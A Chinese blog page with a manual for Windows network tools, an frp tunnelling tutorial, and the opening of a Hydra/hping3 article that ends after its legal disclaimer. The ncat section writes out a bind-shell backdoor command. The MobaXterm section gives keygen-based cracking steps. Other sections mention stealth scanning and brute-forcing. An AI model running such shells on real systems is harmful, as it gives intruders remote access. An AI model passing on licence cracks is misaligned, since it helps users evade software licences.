网络工具 on Liangweidong's blog

Windows 网络与终端工具集：MobaXterm、WindTerm、croc、curl、frp、ncat、nmap、syncthing、TCPCOM、burp 完全手册

Tue, 15 Oct 2024 00:00:00 +0800

一、网络工具分四类

按"我在 Windows 上到底要干什么"分四类：

类别	工具
终端 / SSH	MobaXterm、WindTerm
文件传输	croc、syncthing、TCPCOM
网络探测	curl、ncat、nmap、frp
代理 / 测试	burp（Web 代理）、Frp（内网穿透）

本文把十款工具的绿色版配置 + 实战 + 坑点串成一份手册。

二、终端之王：MobaXterm

2.1 简介

mobaxterm.mobatek.net —— Windows 终端的事实标准。免费 Personal 版够用，但有会话数限制（12 个）和SSH 隧道数量限制。

2.2 中文版与破解

社区维护两个中文项目：

破解思路（仅供学习，商业请购买 Professional）：

1
2
3
4
5
6
7
8


# 1. 启动 keygen 网站
https://moba-x-term-keygen.vercel.app/

# 2. 解压 MobaXterm，把 Custom.mxtpro 放进 MobaXterm 安装目录
# 3. 重启 MobaXterm → 顶部显示 "Professional"

# 注意：不支持默认编码是 UTF-8 的 Windows 系统（显示中文乱码）
# 绝大多数 Windows 中文版默认 GBK/GB2312，正常显示

2.3 免密码登录：密钥对

MobaXterm 集成 PuTTY 的密钥体系。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26


# Step 1: 生成密钥对
Tools → MobaKeyGen (SSH key generator)
 → Generate → 鼠标在进度条下方移动产生随机数
 → Save public key → authorized_keys
 → Save private key → mk.ppk

# Step 2: 公钥上传到服务器
ssh-copy-id -i ~/.ssh/mk.ppk.pub user@<host> # 需先在服务器有密码登录
# 或者手动：
mkdir -p ~/.ssh
chmod 700 ~/.ssh
cat authorized_keys >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

# Step 3: 服务器 sshd_config
RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys
PermitRootLogin yes # 或者 no 禁止 root 登录
PasswordAuthentication no # 关闭密码登录，强制密钥

service sshd restart

# Step 4: MobaXterm 用私钥登录
Sessions → New SSH → Advanced SSH settings
 → Use private key → 选 mk.ppk

2.4 忘记主密码重置

MobaXterm 把所有保存的会话密码加密存在 MobaXterm.ini，忘记主密码后用官方重置工具：

1
2
3
4
5


1. 访问 https://mobaxterm.mobatek.net/resetmasterpassword.html
2. 下载 ResetMasterPassword.zip
3. 把 ResetMasterPassword.exe 与 MobaXterm.exe 放到同一目录
4. 双击运行，提示"所有保存的密码将丢失" → 是
5. 重启 MobaXterm，重新设新密码

三、WindTerm：现代免费终端

3.1 简介

kingToolbox/WindTerm —— 2020+ 出现的国产开源终端，完全免费 + 跨平台（Windows / macOS / Linux）。

3.2 优势 vs MobaXterm

1
2
3
4
5
6
7
8


✓ 完全免费无功能限制
✓ 现代化 UI（VSCode 风格）
✓ 协议支持：SSH / SFTP / Serial / Telnet / RDP / VNC / WSL
✓ 内置 SFTP 面板
✓ 支持多标签 + 面板分割
✓ 性能更好（Go + Web 后端）
✗ 主题生态不如 MobaXterm 丰富
✗ 远程会话管理功能弱

3.3 下载

1

https://github.com/kingToolbox/WindTerm/releases/download/2.5.0/WindTerm_2.5.0_Windows_Portable_x86_64.zip

四、croc：跨端 P2P 文件传输

4.1 简介

schollz/croc —— 一句话描述：带中继的 scp。

4.2 优势

不需要双方都装服务端；
用 code 做配对（6 字符短码），免 IP 免配对；
默认走官方 relay（已 E2E 加密）；
自带中继可私有部署；
跨平台：Windows / macOS / Linux / Android / iOS。

4.3 实战

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


# 1. 发送方
croc send --code <自定义code> <文件/目录>
 例：croc send --code myshare123 C:\Users\me\demo.zip
 输出：Code is: myshare123
 On the other computer run:
 croc myshare123

# 2. 接收方
croc <code>
 例：croc myshare123
 输出：Connecting... ok
 > receiving demo.zip (12.4 MB)
 100% |█████████████| [12.4MB/s]

4.4 高级用法

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


# 指定中继
croc --relay <relay-host>:9009 send --code test123 file.zip

# 自签中继
croc relay # 默认 :9009

# 发送目录
croc send --code share C:\workspace\project\

# 接收重命名
croc myshare123 > received.zip

# 排除文件
croc send --exclude "*.tmp" --code share1 project/

4.5 与 SCP 对比

维度	croc	scp
配对	短码	IP + 账号 + 密码
中继	自带（可私有）	无
大文件	流式，分块	流式
跨平台	全	需 SSH 客户端
进度条	漂亮	简陋
加密	E2E	依赖 SSH

五、curl：HTTP 瑞士军刀

5.1 下载

curl.se/download.html —— Windows 绿色版在 curl.se/windows。

1
2


解压到 D:\portable\dev\curl\
PATH=%PATH%;D:\portable\dev\curl\bin

5.2 常用模式

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35


# GET
curl https://api.github.com/users/octocat

# POST JSON
curl -X POST https://api.example.com/users \
 -H "Content-Type: application/json" \
 -d '{"name":"alice","email":"alice@example.com"}'

# 表单提交
curl -X POST https://example.com/login \
 -d "user=alice&pass=secret"

# 文件上传
curl -X POST https://example.com/upload \
 -F "file=@C:/test.zip"

# 下载文件
curl -O https://example.com/file.zip
curl -o rename.zip https://example.com/file.zip

# 跟随重定向
curl -L https://bit.ly/xxxxx

# 显示响应头
curl -I https://example.com # HEAD
curl -i https://example.com # 头部 + body

# 走代理
curl --proxy socks5://127.0.0.1:1080 https://google.com

# 跳过证书
curl -k https://self-signed.example.com

# 详细调试
curl -v https://example.com # -vv 更详细

六、frp：内网穿透神器

6.1 简介

fatedier/frp —— 把内网机器暴露到公网的开源反向代理。

6.2 架构

1
2
3


内网主机 (frpc) ──> 公网 VPS (frps) ──> Internet 用户
 ↑ 反向连接 ↑
 主动发起，被动接收

6.3 服务端（公网 VPS）配置

frps.ini：

1
2
3
4
5
6


[common]
bind_port = 7000
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = {{REDACTED}}
token = {{REDACTED}}

启动：

1

nohup ./frps -c frps.ini &

6.4 客户端（内网）配置

frpc.ini：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


[common]
server_addr = {{PUBLIC_IP}}
server_port = 7000
token = {{REDACTED}}

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000 # 公网用 6000 端口连

[web]
type = http
local_port = 8080
custom_domains = test.example.com

启动：

1

.\frpc.exe -c frpc.ini

6.5 实战场景

1
2
3
4


- 远程 SSH 内网机器：公网 ssh -p 6000 user@<VPS_IP>
- 临时展示本地 Web：公网访问 test.example.com
- 远程桌面 RDP：内网开 3389，frp 暴露 13389
- TCP 透传：数据库 3306 暴露到公网（注意加 auth）

七、ncat（Nmap 子项目）：网络 IO 工具

7.1 简介

ncat 是 Nmap 项目的网络瑞士军刀（不是老 nc，ncat 默认走 nmap 安装包里的）。支持 TCP/UDP/SCTP/SSL。

7.2 下载

1
2
3


https://nmap.org/download#windows
下载 nmap-x.x.x-setup.exe
# 选 "Register ncat path" 让 cmd/PowerShell 全局识别

把 ncat.exe 复制一份改名为 nc.exe，命令更顺手。

7.3 实战命令

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39


# 1. 监听入站连接
ncat -l 8080

# 2. 连接远程
ncat 192.168.1.100 80
GET / HTTP/1.0
HEAD / HTTP/1.0

# 3. UDP 监听
ncat -l -u 1234
netstat -tunlp | findstr 1234
ncat -v -u <host> 1234

# 4. 聊天工具（局域网最快聊天）
ncat -l 8080 # 服务端
ncat 192.168.1.100 8080 # 客户端

# 5. 文件拷贝
# 接收方
ncat -l 8080 > file.txt
# 发送方（--send-only 传完即关）
ncat 192.168.1.100 8080 --send-only < data.txt

# 6. 端口转发（用 -c 创建中转）
ncat -u -l 80 -c 'ncat -u -l 8080'
# 80 端口的连接自动转到 8080

# 7. 后门（仅实验环境，**绝对禁止生产使用**）
# 服务端
ncat -l 10000 -e /bin/bash
# 客户端
ncat 192.168.1.100 10000
# Windows 端 -e 不可用，用 mkfifo 双向

# 8. 超时
ncat -w 10 192.168.1.100 8080

# 9. 长连接（-k 强制服务端不退出）
ncat -l -k 8080

八、nmap：端口扫描与服务识别

8.1 简介

lwn.net 文章 —— 业界标准，渗透测试和端口审计必装。

8.2 安装

1
2


下载 nmap-x.x.x-setup.exe → 默认装 → 把 path 加 PATH
PATH=%PATH%;D:\Program Files (x86)\Nmap

8.3 核心参数

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21


-A 综合扫描（OS + 服务版本 + 脚本 + traceroute）
-sP Ping 扫描（高效）
-Pn 跳过 ping（适合禁 ICMP 的目标）
-PS / -PA / -PR TCP SYN / ACK / ARP ping
-n 禁止 DNS 反向解析
-T0 ~ -T5 时序：T0 极慢（躲避 IDS）~T5 极速
-p 80 指定端口
-p 1-100 端口范围
-p- 所有端口（1-65535）
-F 快速模式（仅 100 个常用端口）
--top-ports 100 概率最高的前 100 端口
-sS TCP SYN 半连接扫描（隐蔽）
-sT TCP 全连接扫描
-sU UDP 扫描（极慢）
-sN / -sF 隐蔽扫描（FIN / NULL）
-sV 服务版本识别
-sV --allports 扫描所有端口的服务版本
-O 操作系统识别
--open 只显示 open 端口
-vv 详细输出
-oN / -oX / -oG 输出到普通文本 / XML / grepable

8.4 实战模板

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25


# 1. 基础扫描
nmap 127.0.0.1

# 2. 详细扫描
nmap -vv 127.0.0.1

# 3. 端口扫描
nmap 127.0.0.1 -p 80
nmap 127.0.0.1 -p 1-1000
nmap 127.0.0.1 -p- # 1-65535

# 4. 服务版本 + 操作系统
nmap -sV -O 127.0.0.1 -p 80

# 5. 全量扫描（耗时）
nmap -A 127.0.0.1 -p- -oN nmap_full.txt

# 6. 扫描网段
nmap -sP 192.168.1.0/24

# 7. 内网审计
nmap -Pn -sT 192.168.1.100 # 跳过 ping，TCP 全连接

# 8. 看支持 HTTP 方法
nmap -p 80 --script http-methods safe.example.com

8.5 输出样例

1
2
3
4
5


nmap -sS -T4 -sV --version-all <ip> -p 18554

PORT STATE SERVICE VERSION
18554/tcp open rtsp
1 service unrecognized despite returning data.

避坑：内网扫描遵守公司规定，未授权目标禁止扫描。scanme.nmap.org 是 nmap 官方授权的测试目标。

九、syncthing：P2P 跨端同步

9.1 简介

syncthing/syncthing —— 替代 Resilio Sync、Bt Sync 的开源方案。点对点 + 加密 + 多端。

9.2 启动

1
2
3
4
5
6
7


下载 syncthing-windows-amd64.zip → 解压 → 双击 syncthing.exe

# 默认 WebUI
http://127.0.0.1:8384/

# 加 GUI（推荐用 SyncTrayzor）
https://github.com/canton7/SyncTrayzor/releases

9.3 加设备

1
2
3
4
5
6


1. 设备 A 启动 syncthing → Add Device
2. 输入设备 B 的 Device ID
3. 设备 B 收到请求 → Accept
4. Add Folder → 选本地目录 → 共享给设备 B
5. 设备 B 选择接收路径
6. 双向实时同步

9.4 实战场景

1
2
3
4


- 笔记本 ↔ 桌面：项目代码、配置同步
- 家里 NAS ↔ 公司电脑：办公资料
- 手机（Android/iOS）↔ 电脑：照片、文档
- 替代 Dropbox：自托管，零成本

十、TCPCOM：串口调试

10.1 简介

cmsoft.cn/resource/110.html —— 国内常见的串口调试助手，比 putty 直观。

10.2 实战：调嵌入式设备

1
2
3
4
5
6


1. 选择 COM 端口（设备管理器查）
2. 波特率 115200 / 8 / N / 1
3. ☑ HEX 显示
4. 打开串口
5. 收到嵌入式设备的启动日志
6. 配合 ncat/nmap 排查网络端口

十一、burp：Web 渗透测试

11.1 简介

portswigger.net/burp —— Web 渗透测试事实标准，专业工具，合法授权使用。

11.2 替代：免费社区版

2023+ Burp Suite Community Edition 完全免费，够日常使用。

11.3 下载

1
2


https://portswigger.net/burp/releases
下载 BurpSuiteCommunity.jar

11.4 启动

1

java -jar BurpSuiteCommunity.jar

11.5 实战：抓包改包

1
2
3
4
5


1. Proxy → Options → 127.0.0.1:8080
2. 浏览器装 FoxyProxy 或 SwitchyOmega 走 127.0.0.1:8080
3. 浏览器访问 HTTP 站点 → burp Proxy 拦截
4. 修改请求 → Forward
5. 改包测越权 / 注入

11.6 配合浏览器代理

1
2
3
4
5


SwitchyOmega:
 代理协议：HTTP
 代理服务器：127.0.0.1
 代理端口：8080
 → 一键切换"走 burp / 不走 burp"

十二、组合 SOP

12.1 应急：客户机器某个端口不通

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


# 1. 本机看端口
netstat -ano | findstr 8080

# 2. 扫客户机器
nmap -Pn -p 8080 <client-ip>

# 3. 连一下测试
ncat -v <client-ip> 8080
# → open : OK
# → Connection refused : 端口没开
# → timeout : 防火墙丢包

# 4. SSH 进去
MobaXterm / WindTerm → 新建 SSH 会话 → 登录

12.2 跨端文件分享

1
2
3
4
5
6
7


# 场景：把 500MB 视频从办公室电脑传给家里电脑
# 选项 A：croc（最快）
croc send --code video2024 C:\videos\demo.mp4
# 家里电脑 croc video2024

# 选项 B：syncthing（持续同步）
# 在两台机器都装 syncthing，加为设备，共享 videos 目录

12.3 远程客户现场

1
2
3
4
5
6


1. WindTerm SSH 到客户的跳板机
2. nmap 扫内网，找到目标服务端口
3. ncat 测试连通性
4. curl 拉接口返回内容
5. burp 抓包调试 HTTP 协议问题
6. frp 内网穿透开 Web 服务给客户查看

十三、文件归档

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


D:\portable\net\
├── mobaxterm\ # 终端 1
├── windterm\ # 终端 2
├── croc\ # P2P 文件传输
├── curl\ # HTTP CLI
├── nmap\ # 端口扫描
├── ncat\ # 网络 IO
├── frp\ # 内网穿透
├── syncthing\ # P2P 同步
├── tcpcom\ # 串口调试
└── burp\ # Web 渗透

十四、常见坑

现象	原因	对策
MobaXterm 中文乱码	客户端编码不匹配	会话属性 → Remote environment 设为 UTF-8
WindTerm 启动报缺失 DLL	缺 VC++ Runtime	装 Visual C++ Redistributable
croc 走不动 relay	公司防火墙拦截 9009	部署私有 relay：`croc relay --ports 9009`
curl 在 Windows 报 SSL	缺 CA 证书	用 `-k` 跳过或装 OpenSSL
nmap 扫不动 Win10	Win10 防火墙拦截	加 `-Pn` 跳过 ping
frp 连不上服务端	token 不匹配 / 端口被拦	检查两端 token 字符串完全一致
burp 抓 HTTPS 乱码	证书未导入	浏览器访问 `http://burp` 下载并信任证书
syncthing 同步冲突	双向编辑	设 .stignore 排除运行时文件

十五、下一步

MobaXterm 进阶：用 macro 自动登录大量服务器
WindTerm 进阶：用 windterm --help 看 CLI 自动重连
nmap 进阶：学 NSE 脚本（nmap --script=vuln）
burp 进阶：Intruder 模块做密码爆破、Scanner 模块做自动化漏洞扫描
frp 进阶：HTTPS 反代、STCP 模式（点对点加密）

十六、参考资料

FRP 内网穿透实战：让公网 VPS 暴露内网 SSH、MySQL 与 Web 服务

Fri, 15 Sep 2017 00:00:00 +0800

背景

家里或公司内网的机器没有公网 IP，外面想 SSH 进去、连 MySQL、访问内网 Web 系统——传统的方案是路由器做端口映射，或者买花生壳这种商业服务。frp（Fast Reverse Proxy）用一台有公网 IP 的 VPS 作为"中转"，让任何内网服务"看起来"跑在公网 IP 上，部署简单，开源免费。

适用场景：

远程办公，需要从公网 SSH 进内网开发机
临时把内网 MySQL 暴露给第三方调试
异地访问家里的 NAS、摄像头、Git 服务
没有公网 IP 的云主机需要对外提供 Web 服务

前置知识：

一台有公网 IP 的 VPS（带宽建议 ≥ 5Mbps）
Linux 基础（systemd、iptables）
一点网络常识（端口、TCP/UDP）

注意：frp 把内网服务"反向"暴露到公网，任何能连到 frps 端口的人都能访问。请务必：

使用 token 鉴权

配合 fail2ban 或 ACL 限制来源 IP

暴露 SSH 等高危服务时启用 stcp/xtcp 加密模式

一、frp 工作原理

1
2


[公网客户端] ──> frps (公网 VPS :7000) ──> frpc (内网机器)
 ↑ 中转、反向代理 ↑ 主动连接建立隧道

关键点：

frps（server）跑在公网 VPS，监听 bind_port（默认 7000）
frpc（client）跑在内网机器，主动连到 frps，建立长连接
公网客户端访问 VPS_IP:remote_port，frps 把流量通过已建立的隧道转发给 frpc，再由 frpc 转发到内网的 local_ip:local_port

支持的代理类型（frp 0.20+）：

类型	用途	备注
`tcp`	纯 TCP 端口映射	SSH、MySQL、Redis、自定义协议
`udp`	纯 UDP 端口映射	DNS、游戏、VoIP
`http`	HTTP 应用	支持改 Host Header、basic auth
`https`	HTTPS 应用	配合证书
`stcp`	安全 TCP（需两边都跑 frpc）	不在服务端暴露端口，访问者也需密钥
`xtcp`	点对点穿透	流量不经过服务器中转，UDP 打洞

二、安装

2.1 下载二进制

frp 0.43.0（2022-02 发布，长期维护版本）：

1
2
3
4
5
6
7


# Linux x86_64
curl -O https://github.com/fatedier/frp/releases/download/v0.43.0/frp_0.43.0_linux_amd64.tar.gz
tar -zxvf frp_0.43.0_linux_amd64.tar.gz -C /usr/local/games
mv /usr/local/games/frp_0.43.0_linux_amd64 /usr/local/games/rp

# Windows 客户端
# https://github.com/fatedier/frp/releases/download/v0.43.0/frp_0.43.0_windows_amd64.zip

2024-05 更新提示：frp 已迭代到 0.60+，大版本（v0.50+）开始推 TOML 配置，0.43 仍是 INI 经典格式。本篇示例兼顾 0.43（INI）和 0.50+（TOML）。

2.2 Docker 部署

1
2
3
4
5
6
7
8
9


# 服务端
docker run -d --restart=always --network host \
 -v /etc/frp/frps.ini:/etc/frp/frps.ini \
 --name frps snowdreamtech/frps

# 客户端
docker run -d --restart=always --network host \
 -v /etc/frp/frpc.ini:/etc/frp/frpc.ini \
 --name frpc snowdreamtech/frpc

--network host 让 frpc 直接监听内网服务端口，避免 Docker 端口映射的复杂性。

三、配置详解（INI 经典格式）

3.1 服务端 frps.ini

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


[common]
bind_addr = 0.0.0.0
bind_port = 7000
# 鉴权令牌，客户端必须一致
token = your_strong_token_here
# Dashboard 端口（可选，浏览器看连接状态）
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = your_dashboard_pwd
# 日志
log_file = /var/log/frps.log
log_level = info
log_max_days = 7
# 允许的端口范围（防止被滥用）
allow_ports = 2000-3000,5000-6000,6000-10000

关键参数：

token 必设，防止别人白嫖你的 VPS
allow_ports 限制客户端能使用的 remote_port 段
dashboard_port 默认关闭，开启后通过浏览器看连接状态

3.2 客户端 frpc.ini（内网机器）

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34


[common]
server_addr = x.x.x.x # frps 的公网 IP
server_port = 7000
token = your_strong_token_here

# SSH 暴露
[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000

# MySQL 暴露
[mysql]
type = tcp
local_ip = 127.0.0.1
local_port = 3306
remote_port = 3307

# Web 服务（HTTP 代理）
[web]
type = http
local_port = 8080
local_ip = 127.0.0.1
custom_domains = your.domain.com
locations = /

# 加密模式（推荐用于敏感服务）
[secret_ssh]
type = stcp
# 只有知道 sk 的人才能连
sk = abcdefgh
local_ip = 127.0.0.1
local_port = 22

四、HTTPS / Web 应用场景

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25


# frps.ini（服务端）
[common]
bind_addr = 0.0.0.0
bind_port = 7000
vhost_http_port = 80
vhost_https_port = 443
token = your_strong_token_here

# frpc.ini（客户端）
[common]
server_addr = x.x.x.x
server_port = 7000
token = your_strong_token_here

[blog]
type = http
local_port = 3000
local_ip = 127.0.0.1
custom_domains = blog.example.com

[wiki]
type = https
local_port = 443
local_ip = 127.0.0.1
custom_domains = wiki.example.com

注意：域名解析到 frps 的公网 IP，frps 根据 custom_domains 路由到不同 frpc。

五、systemd 守护（推荐生产方式）

5.1 服务端 /etc/systemd/system/rps.service

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


[Unit]
Description = frp server
After = network.target syslog.target
Wants = network.target

[Service]
Type = simple
ExecStart = /usr/local/games/rp/frps -c /usr/local/games/rp/frps.ini
Restart = always
RestartSec = 5s

[Install]
WantedBy = multi-user.target

5.2 客户端 /etc/systemd/system/rpc.service

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


[Unit]
Description = frp client
After = network.target
Wants = network.target

[Service]
Type = simple
ExecStart = /usr/local/games/rp/frpc -c /usr/local/games/rp/frpc.ini
Restart = always
RestartSec = 20s
User = nobody

[Install]
WantedBy = multi-user.target

1
2
3
4


systemctl daemon-reload
systemctl enable --now rps # 服务端
systemctl enable --now rpc # 客户端
systemctl status rpc

5.3 验证连接

1
2
3


# 从公网客户端访问
ssh -p 6000 root@<vps-public-ip>
# 实际上等同于 SSH 进内网机器的 22 端口

六、TOML 格式（frp 0.50+）

frp 0.50+ 推荐 TOML：

1
2
3
4
5
6
7
8
9


# frps.toml
bindAddr = "0.0.0.0"
bindPort = 7000
auth.method = "token"
auth.token = "your_strong_token_here"
webServer.addr = "0.0.0.0"
webServer.port = 7500
webServer.user = "admin"
webServer.password = "your_dashboard_pwd"

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19


# frpc.toml
serverAddr = "x.x.x.x"
serverPort = 7000
auth.method = "token"
auth.token = "your_strong_token_here"

[[proxies]]
name = "ssh"
type = "tcp"
localIP = "127.0.0.1"
localPort = 22
remotePort = 6000

[[proxies]]
name = "mysql"
type = "tcp"
localIP = "127.0.0.1"
localPort = 3306
remotePort = 3307

七、批量部署多个内网机器

假设一台公网 VPS 暴露多个内网客户的 MySQL/SSH：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


# 客户端 A（客户 A）
[mysql]
type = tcp
local_ip = 127.0.0.1
local_port = 3306
remote_port = 6101

# 客户端 B（客户 B）
[mysql]
type = tcp
local_ip = 127.0.0.1
local_port = 3306
remote_port = 6102

配合 fail2ban：因为所有 frpc 看到的来源都是 127.0.0.1，必须在 frps 端 配置 fail2ban，按 frps 日志里的真实 IP 拉黑。

1
2
3
4


# /etc/fail2ban/filter.d/frps.conf
[Definition]
failregex = ^.*get a user connection \[<HOST>:[0-9]*\]
ignoreregex = ^.*\[.*gateway.*

八、常见问题

8.1 连接后立即断开

检查 VPS 的 7000 和 remote_port 是否在安全组/防火墙开放
客户端 server_addr 写错（写成了内网 IP）
token 不一致

8.2 速度慢

frp 走 TCP 中转，带宽 = min(VPS 上行, frpc 上行)
加密模式 stcp/xtcp 略增加 CPU 消耗
大文件传输考虑 rclone + 临时公网 OSS

8.3 0.50+ 升级后 INI 不识别

frp 0.50 删除了对 INI 的支持，统一 TOML。用 v0.43.0 仍是 INI，v0.52.3 之后基本 TOML 化。

九、卸载

1
2
3
4
5
6


systemctl stop rpc
systemctl disable rpc
rm -rf /etc/systemd/system/rpc.service
rm -rf /usr/local/games/rp
systemctl daemon-reload
systemctl reset-failed rpc

小结

frp 0.20~0.43 是经典 INI 时代，0.50+ 切到 TOML，核心架构没变：主动连接 + 长隧道 + 端口映射。生产部署三个要点：

必设 token，避免被白嫖
配合 fail2ban，按 frps 日志真实 IP 拉黑攻击者
systemd 守护 + Restart=always，客户端断开自动重连

下一步：

把 frps 配合 nginxWebUI 做证书自动续期（HTTP 代理场景）
用 stcp/xtcp 加密模式暴露 SSH
高敏感服务用 WireGuard 替代 frp（点对点，无中转）

2024 视角：frp 0.59+ 在云原生时代的"角色变化"

2017 那篇 frp 是"内网穿透神器"。2024 视角下，frp 仍是经典，但有 3 个新选择更激进。

一、frp 版本进化（2024 主流）

frp 0.59+（2024-06 起持续更新）：全面 TOML 化，INI 已被废弃。
新特性：
- WebSocket over TLS（2024）：WSS 模式走 443 端口，能穿透企业防火墙
- QUIC 协议（实验性）：UDP 传输，比 TCP 模式延迟低 20%
- 带宽限制 / 速率统计：精确控制客户端带宽
- 多 frpc 共享 frps：跨 NAT 设备互联

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


# frps.toml (0.59+)
bindAddr = "0.0.0.0"
bindPort = 7000
auth.method = "token"
auth.token = "your_strong_token"

# 启用 WSS（重要：能穿透企业防火墙）
transport.websocket.enable = true
transport.websocket.url = "/_frp_ws"

# 启用 QUIC（2024 新）
transport.quic.enable = true

二、Cloudflare Tunnel——2024 主流替代

Cloudflare Tunnel（cloudflared）：不需要公网 VPS——Cloudflare 边缘做"中转"。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


# 装
curl -fsSL https://pkg.cloudflare.com/cloudflare-main.gpg | sudo tee /usr/share/keyrings/cloudflare-main.gpg >/dev/null
echo 'deb [signed-by=/usr/share/keyrings/cloudflare-main.gpg] https://pkg.cloudflare.com/cloudflared focal main' | sudo tee /etc/apt/sources.list.d/cloudflared.list
apt update && apt install cloudflared

# 登录
cloudflared tunnel login
cloudflared tunnel create my-tunnel
cloudflared tunnel route dns my-tunnel myapp.example.com

# 启动（后台）
cloudflared tunnel --config /etc/cloudflared/config.yml run my-tunnel

1
2
3
4
5
6
7
8


# /etc/cloudflared/config.yml
tunnel: my-tunnel
credentials-file: /root/.cloudflared/xxxxxx.json

ingress:
 - hostname: myapp.example.com
 service: http://localhost:3000
 - service: http_status:404

优势：
- 不需要公网 VPS（Cloudflare 边缘免费）
- 零暴露端口（只用 HTTPS 443 出站）
- Cloudflare 整套生态：CDN / WAF / DDoS 防护 / 零信任鉴权
- 免费 50 个 tunnel / 1000 次请求/秒
2024 大量新项目用 Cloudflare Tunnel 替代 frp。

三、Tailscale —— “点对点 VPN” 替代内网穿透

2017 那篇 frp 是"反代中转"。2024 主流是 P2P VPN：

1
2
3
4


# 装 Tailscale
curl -fsSL https://tailscale.com/install.sh | sh
tailscale up
# 自动获得 100.x.x.x 虚拟 IP

Tailscale SSH 替代 SSH 隧道：
- 不需要公网 IP
- 不需要 frp 中转
- 鉴权走 Tailscale ACL（不是 SSH 公私钥）

1
2
3
4


# 直接 SSH 任何 Tailscale 设备
ssh user@machine-name
# Tailscale 自动协商点对点连接（UDP 打洞）
# 如果 P2P 失败，自动 fallback 到 Tailscale DERP 中转（仍比 frp 简单）

Tailscale ACL（基于 WireGuard）：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


// tailscale ACL
{
 "acls": [
 {
 "action": "accept",
 "src": ["group:dev"],
 "dst": ["tag:prod-server:22"]
 }
 ]
}

四、frp 在 K8s 时代的"角色"

2024 趋势：K8s 项目用 Ingress + Cloudflare Tunnel 替代 frp。
frp 仍在用的场景：
- 自建机房（无 Cloudflare）
- 临时调试（1 小时建一个隧道）
- 边缘设备（IoT / 工厂）
- 企业内网（不能用 Cloudflare）

五、frp 安全加固的"现代"姿势

2017 那篇给 token 鉴权。2024 升级：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


# frps.toml - 强认证
auth.method = "token"
auth.token = "<random-32-chars>"
auth.additionalScopes = ["Heartbeat"]

# TLS 加密（防中间人）
transport.tls.force = true

# 限速（防滥用）
transport.maxPoolCount = 5

1
2
3
4
5
6
7


# frpc.toml - 强认证
auth.method = "token"
auth.token = "<random-32-chars>"

# 多重 TLS
transport.tls.enable = true
transport.tls.disableCustomTLSFirstByte = false

六、frp 性能优化

2024 实测：frp 0.59+ 在 1Gbps 内网下，单 tunnel 可达 800+ Mbps（TCP 直连）。
多 tunnel 负载（frp 0.59+）：

1
2
3
4
5
6
7


[[proxies]]
name = "web1"
type = "tcp"
localPort = 80
remotePort = 8080
# 启用多路复用
transport.bandwidthLimit = "100MB"

QUIC 协议（2024 实验）：减少握手延迟（首次连接 0-RTT）。

七、frp 的"替代品"对比（2024）

工具	架构	适用
frp	客户端-服务器	自建 VPS、临时穿透
Cloudflare Tunnel	客户端-Cloudflare 边缘	不需要 VPS、零信任
Tailscale	P2P（WireGuard）	长期组网、家庭 / 远程办公
ZeroTier	P2P + Controller	多平台、大规模
nps（国产）	客户端-服务器	国内网络、简单场景
lanproxy（国产）	Java 写	简单 Java 项目集成
rathole（2022+）	Rust 写	性能敏感、嵌入式
bore（Rust）	极简	个人项目、临时调试

八、frp + Cloudflare Tunnel 的"混合"

2024 一些项目同时用 frp + Cloudflare Tunnel：
- frp 做"内网到 VPS"的隧道
- Cloudflare Tunnel 做"VPS 到公网"的暴露
- 效果：VPS 的 IP 永远不暴露（Cloudflare 边缘代为接受流量）

九、AI 时代的"运维代理"

2024 LLM 时代：AI Agent（如 Claude Code / Devin）需要 SSH 访问内网服务器。
Tailscale / Cloudflare Tunnel 让 AI Agent 不需要公网 IP 就能访问内网。
未来：frp 在 AI Agent 场景会"云化"——AI Agent 通过 Tunnel 远程执行命令。

源文档：

os/linux/第三方tools/net/frp/内网穿透.md（内网穿透场景、systemd 模板、Docker 部署）
os/linux/第三方tools/net/frp/frp.md（多客户端批量配置、fail2ban 集成、TOML 新格式）

Hydra 与 hping3：密码爆破与流量压测工具实战（含完整参数表）

Thu, 15 Jun 2017 00:00:00 +0800

⚠️ 法律与授权声明

本文介绍的 hydra（密码爆破）和 hping3（流量压测/DDoS 工具）只能用于：

自己拥有或明确授权测试的服务器
渗透测试授权书范围内的甲方系统
CTF 比赛或靶场（HackTheBox、DVWA、VulnHub 等）

未经授权对他人系统使用 = 违法。中国《刑法》第 285、286 条「非法侵入计算机信息系统罪」「破坏计算机信息系统罪」可判 3-7 年有期徒刑，DDos 攻击入罪门槛更低、量刑更重。

任何"我就是想测一下"的侥幸行为都不值得冒刑事风险。

背景

